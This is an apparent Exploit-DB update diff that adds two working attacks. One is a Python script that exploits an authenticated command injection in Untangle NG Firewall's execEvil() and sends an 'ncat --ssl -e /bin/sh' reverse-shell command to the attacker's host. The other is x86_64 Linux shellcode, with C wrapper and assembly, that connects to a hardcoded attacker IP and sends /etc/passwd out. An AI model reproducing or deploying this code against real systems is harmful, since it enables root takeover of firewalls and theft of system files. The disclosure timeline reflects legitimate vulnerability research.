DB: 2016-06-29

2 new exploits

Linux x86_64 /etc/passwd File Sender Shellcode
Untangle NGFW 12.1.0 beta - execEvil() Command Injection

files.csv

@@ -36202,3 +36202,5 @@ id,file,description,date,author,platform,type,port
 40026,platforms/lin_x86/shellcode/40026.txt,"Linux x86 /bin/sh Shellcode + ASLR Bruteforce",2016-06-27,"Pawan Lal",lin_x86,shellcode,0
 40027,platforms/php/webapps/40027.txt,"SugarCRM 6.5.18 - PHP Code Injection",2016-06-27,"Egidio Romano",php,webapps,80
 40028,platforms/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443
+40029,platforms/lin_x86-64/shellcode/40029.c,"Linux x86_64 /etc/passwd File Sender Shellcode",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+40030,platforms/json/webapps/40030.py,"Untangle NGFW 12.1.0 beta - execEvil() Command Injection",2016-06-28,"Matt Bush",json,webapps,80

platforms/json/webapps/40030.py

@@ -0,0 +1,75 @@
+#!/usr/bin/python
+
+# Title:       Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit
+# CVE:        (Not yet assigned)
+# Discovery:      Matt Bush (@3xocyte)
+# Exploit:      Matt Bush
+# Contact:      mbush@themissinglink.com.au
+
+# Disclosure Timeline:
+# 22/4/2016      Attempted to contact vendor after discovery of vulnerabilities
+# 6/5/2016      No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
+# 12/5/2016      US-CERT confirms contacting vendor
+# 16/6/2016      US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
+# 27/6/2016       Public disclosure
+
+# A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with
+# root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous 
+# versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages
+# the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).
+
+# The author is not responsible for how this script or any information within this script is used. Don't do anything stupid.
+
+import json, requests, sys
+
+if len(sys.argv) < 5:
+  print "[!] usage: " + sys.argv[0] + " <RHOST> <LHOST> <username> <password>"
+  print "[!] and in a separate terminal: 'ncat --ssl -nlvp 443'"
+  sys.exit()
+
+print "\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit"
+print "                          by @3xocyte\n"
+
+rhost = sys.argv[1]
+lhost = sys.argv[2]
+username = sys.argv[3]
+password = sys.argv[4]
+
+login_url = "http://" + rhost + "/auth/login?url=/webui&realm=Administrator"
+rpc_url = "http://" + rhost + "/webui/JSON-RPC"
+auth = {'username': username, 'password': password}
+
+print "[*] Opening session..."
+session = requests.Session()
+
+print "[*] Authenticating..."
+try:
+  login = session.post(login_url, data=auth)
+  get_nonce = {"id":1,"nonce":"","method":"system.getNonce","params":[]}
+  req_nonce = session.post(rpc_url, data=json.dumps(get_nonce))
+  data = json.loads(req_nonce.text)
+  nonce = data['result']
+except:
+  print "[!] Authentication failed. Quitting."
+  sys.exit()
+
+print "[*] Getting execManager objectID..."
+try:
+  get_obj_id = {"id":2,"nonce":nonce,"method":"UvmContext.getWebuiStartupInfo","params":[]}
+  req_obj_id = session.post(rpc_url, data=json.dumps(get_obj_id))
+  data = json.loads(req_obj_id.text)
+  object_id = data['result']['execManager']['objectID']
+
+except:
+  print "[!] Could not get execManager objectID. Quitting."
+  sys.exit()
+
+print "[*] Exploiting Ung.Main.getExecManager().execEvil()..."
+try:
+  exploit = {"id":3,"nonce":nonce,"method":".obj#" + str(object_id) + ".execEvil","params":["ncat --ssl -e /bin/sh " + lhost + " 443"]}
+  session.post(rpc_url, data=json.dumps(exploit))
+except:
+  print "[!] Exploit failed. Quitting."
+  sys.exit()
+
+print "[*] Exploit sent!"

platforms/lin_x86-64/shellcode/40029.c

@@ -0,0 +1,212 @@
+/*
+    # Title : Linux x86_64 /etc/passwd file sender shellcode
+    # Date : 28-06-2016
+    # Author : Roziul Hasan Khan Shifat
+    # Tested On : Ubuntu 14.04 LTS x86_64
+*/
+
+
+/*
+
+Disassembly of section .text:
+
+0000000000400080 <_start>:
+  400080:	48 31 c0             	xor    %rax,%rax
+  400083:	b0 39                	mov    $0x39,%al
+  400085:	0f 05                	syscall 
+  400087:	99                   	cltd   
+  400088:	48 39 d0             	cmp    %rdx,%rax
+  40008b:	74 07                	je     400094 <send>
+  40008d:	48 31 c0             	xor    %rax,%rax
+  400090:	b0 3c                	mov    $0x3c,%al
+  400092:	0f 05                	syscall 
+
+0000000000400094 <send>:
+  400094:	b2 06                	mov    $0x6,%dl
+  400096:	48 31 f6             	xor    %rsi,%rsi
+  400099:	48 ff c6             	inc    %rsi
+  40009c:	40 b7 02             	mov    $0x2,%dil
+  40009f:	48 31 c0             	xor    %rax,%rax
+  4000a2:	b0 29                	mov    $0x29,%al
+  4000a4:	0f 05                	syscall 
+  4000a6:	4d 31 c0             	xor    %r8,%r8
+  4000a9:	49 89 c0             	mov    %rax,%r8
+  4000ac:	48 31 c0             	xor    %rax,%rax
+  4000af:	99                   	cltd   
+  4000b0:	48 31 ff             	xor    %rdi,%rdi
+  4000b3:	48 31 f6             	xor    %rsi,%rsi
+  4000b6:	50                   	push   %rax
+  4000b7:	50                   	push   %rax
+  4000b8:	50                   	push   %rax
+  4000b9:	c6 04 24 02          	movb   $0x2,(%rsp)
+  4000bd:	66 c7 44 24 02 05 c0 	movw   $0xc005,0x2(%rsp)
+  4000c4:	c7 44 24 04 c0 a8 56 	movl   $0x8056a8c0,0x4(%rsp)
+  4000cb:	80 
+  4000cc:	48 89 e6             	mov    %rsp,%rsi
+  4000cf:	b2 10                	mov    $0x10,%dl
+  4000d1:	4c 89 c7             	mov    %r8,%rdi
+
+00000000004000d4 <connect>:
+  4000d4:	48 31 c0             	xor    %rax,%rax
+  4000d7:	b0 2a                	mov    $0x2a,%al
+  4000d9:	0f 05                	syscall 
+  4000db:	4d 31 c9             	xor    %r9,%r9
+  4000de:	4c 39 c8             	cmp    %r9,%rax
+  4000e1:	75 f1                	jne    4000d4 <connect>
+  4000e3:	48 31 c0             	xor    %rax,%rax
+  4000e6:	48 31 f6             	xor    %rsi,%rsi
+  4000e9:	50                   	push   %rax
+  4000ea:	50                   	push   %rax
+  4000eb:	50                   	push   %rax
+  4000ec:	c7 04 24 2f 65 74 63 	movl   $0x6374652f,(%rsp)
+  4000f3:	c7 44 24 04 2f 2f 70 	movl   $0x61702f2f,0x4(%rsp)
+  4000fa:	61 
+  4000fb:	c7 44 24 08 73 73 77 	movl   $0x64777373,0x8(%rsp)
+  400102:	64 
+  400103:	48 89 e7             	mov    %rsp,%rdi
+  400106:	b0 02                	mov    $0x2,%al
+  400108:	0f 05                	syscall 
+  40010a:	48 89 c6             	mov    %rax,%rsi
+  40010d:	4c 89 c7             	mov    %r8,%rdi
+  400110:	99                   	cltd   
+  400111:	66 41 ba 88 13       	mov    $0x1388,%r10w
+  400116:	48 31 c0             	xor    %rax,%rax
+  400119:	b0 28                	mov    $0x28,%al
+  40011b:	0f 05                	syscall 
+  40011d:	48 31 c0             	xor    %rax,%rax
+  400120:	b0 3c                	mov    $0x3c,%al
+  400122:	0f 05                	syscall
+
+*/
+
+
+/*
+
+section .text
+	global _start
+_start:
+
+xor rax,rax
+mov al,57
+syscall
+
+cdq
+cmp rax,rdx
+jz send
+
+xor rax,rax
+mov al,60
+syscall
+
+send:
+;----------------
+;connecting to server
+;-------------------------
+
+;creating socket
+
+
+mov dl,6
+xor rsi,rsi
+inc rsi
+mov dil,2
+
+
+xor rax,rax
+mov al,41
+syscall
+
+;---------------------
+xor r8,r8
+mov r8,rax ;socket descriptor
+
+;----------------------------
+;connecting.............
+
+;struct sockaddr_in 16 bytes
+;sin_family 2 bytes
+;sin_port 2 bytes
+;sin_addr 4 bytes
+
+
+xor rax,rax
+cdq
+xor rdi,rdi
+xor rsi,rsi
+
+
+push rax
+push rax
+push rax
+
+mov [rsp],byte 2
+mov [rsp+2],word 0xc005 ;port 1472 (change it if U want)
+mov [rsp+4],dword 0x8056a8c0 ;change it to attacker IP
+
+mov rsi,rsp
+
+mov dl,16
+
+mov rdi,r8
+
+connect:
+xor rax,rax
+mov al,42
+syscall
+
+xor r9,r9
+cmp rax,r9
+jnz connect
+
+;------------------------------
+;opennig /etc/passwd
+
+xor rax,rax
+xor rsi,rsi
+
+push rax
+push rax
+push rax
+
+mov [rsp],dword '/etc'
+mov [rsp+4],dword '//pa'
+mov [rsp+8],dword 'sswd'
+
+mov rdi,rsp
+
+mov al,2
+syscall
+;----------------------
+
+
+
+;sending...............
+mov rsi,rax ;in_fd
+mov rdi,r8 ;out_fd
+cdq
+mov r10w,5000
+xor rax,rax
+mov al,40
+syscall
+;--------------
+
+;exiting
+
+xor rax,rax
+mov al,60
+syscall
+
+*/
+
+
+#include<stdio.h>
+#include<string.h>
+
+char shellcode[]="\x48\x31\xc0\xb0\x39\x0f\x05\x99\x48\x39\xd0\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\xb2\x06\x48\x31\xf6\x48\xff\xc6\x40\xb7\x02\x48\x31\xc0\xb0\x29\x0f\x05\x4d\x31\xc0\x49\x89\xc0\x48\x31\xc0\x99\x48\x31\xff\x48\x31\xf6\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xc0\xc7\x44\x24\x04\xc0\xa8\x56\x80\x48\x89\xe6\xb2\x10\x4c\x89\xc7\x48\x31\xc0\xb0\x2a\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x75\xf1\x48\x31\xc0\x48\x31\xf6\x50\x50\x50\xc7\x04\x24\x2f\x65\x74\x63\xc7\x44\x24\x04\x2f\x2f\x70\x61\xc7\x44\x24\x08\x73\x73\x77\x64\x48\x89\xe7\xb0\x02\x0f\x05\x48\x89\xc6\x4c\x89\xc7\x99\x66\x41\xba\x88\x13\x48\x31\xc0\xb0\x28\x0f\x05\x48\x31\xc0\xb0\x3c\x0f\x05";
+
+main()
+{
+printf("shellcode length %ld\n",(long)strlen(shellcode));
+(* (int(*)()) shellcode) ();
+}
+